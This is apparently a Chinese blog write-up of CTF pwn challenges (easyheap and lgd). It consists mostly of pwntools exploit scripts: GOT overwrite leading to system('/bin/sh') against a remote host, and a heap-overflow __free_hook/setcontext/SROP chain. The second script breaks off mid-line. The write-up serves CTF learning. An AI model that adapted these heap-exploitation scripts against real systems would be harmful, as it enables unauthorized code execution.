高校战“疫”网络安全分享赛pwn部分wp

高校战“疫”网络安全分享赛pwn部分wp

博客地址

easyheap

刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。
在这里插入图片描述
漏洞在申请的大小大于0x400时,return。这时ptr[i]没有被释放,接下来就是常规劫持ptr[i]堆块上的指针为got表。修改got表。来实现利用。


```python
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	def add(size,content):
		p.sendlineafter("Your choice:\n","1")
		p.sendlineafter("this message?\n",str(size))
		p.sendafter("content of the message?\n",content)
	def free(index):
		p.sendlineafter("Your choice:\n","2")
		p.sendlineafter("item to be deleted?\n",str(index))
	def edit(index,content):
		p.sendlineafter("Your choice:\n","3")
		p.sendlineafter(" the item to be modified?\n",str(index))
		p.sendafter("content of the message?\n",content)
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	add(0x18,'\xff'*0x18)
	free(0)
	p.sendlineafter("Your choice:\n","1")
	p.sendlineafter("this message?\n",str(0x500))
	p.sendlineafter("Your choice:\n","1")
	p.sendlineafter("this message?\n",str(0x500))
	edit(0,p64(0)+p64(0x21)+p64(0x6020d8))
	edit(1,p64(0x6020f0)+p64(0x602100)+p64(0)+p64(elf.got['free'])+p64(0x200)+p64(0x602108)+'/bin/sh\x00')
	#gdb.attach(p)
	edit(0,p64(0)+p64(0x21)+p64(elf.got['free']))
	edit(1,p64(elf.plt['puts']))
	edit(0,p64(0)+p64(0x21)+p64(elf.got['puts']))
	free(1)
	puts_addr=u64(p.recv(6).ljust(8,'\x00'))
	libcbase_addr=puts_addr-libc.symbols['puts']
	system_addr=libcbase_addr+libc.symbols['system']
	binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
	edit(3,p64(system_addr))
	free(4)
	print "system_addr=>",hex(system_addr)
	print "libcbase_addr=>",hex(libcbase_addr)
	p.interactive()
if __name__ == '__main__':
	pwn('121.36.209.145',9997,0,'./easyheap')

lgd

开沙盒的堆溢出,老实说之前没遇到过这种。
在这里插入图片描述
在edit时read的长度为add时写在bss段字符串的长度。 造成了堆溢出。 利用堆溢出挟持__free_hooksetcontext,从而劫持rsp,rip,从而劫持程序,在利用ORW来泄露flag

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	def add(size,content):
		p.sendlineafter(">> ","1")
		p.sendlineafter("______?\n",str(size))
		p.sendafter("yes_or_no?\n",content)
	def free(index):
		p.sendlineafter(">> ","2")
		p.sendlineafter("index ?\n",str(index))
	def show(index):
		p.sendlineafter(">> ","3")
		p.sendlineafter("index ?\n",str(index))
	def edit(index,content):
		p.sendlineafter(">> ","4")
		p.sendlineafter("index ?\n",str(index))
		p.sendafter("c___new_content ?\n",content)
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	p.sendlineafter("what is your name? \n","aaa")
	add(0x50,"\xff"*0x200)
	add(0xf8,'\xff'*0x200)
	add(0x68,"\xff"*0x200)
	free(1)
	free(2)
	edit(0,"A"*0x58+"B"*8)
	show(0)
	p.recvuntil("BBBBBBBB")
	main_arena=u64(p.recv(6).ljust(8,"\x00"))
	libcbase_addr=main_arena-(0x7f9f177d8b78-0x7f9f17414000)
	free_hook=libcbase_addr+libc.symbols['__free_hook']
	edit(0,"A"*0x58+p64(0x101)+p64(main_arena)+p64(free_hook-0x40)+p64(0)*28+p64(0x100)+p64(0x71)+p64(free_hook-0x33))
	add(0xf8,'\xff'*0x200)
	add(0x68,'\xff'*0x200)
	add(0x68,'\xff'*0x200)
	edit(3,p64(0)*4+'\x00'*3+p64(libcbase_addr+libc.symbols['setcontext']+0x35))
	frame = SigreturnFrame()
	frame.rdi = 0
	frame.rax = 0
	frame.
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值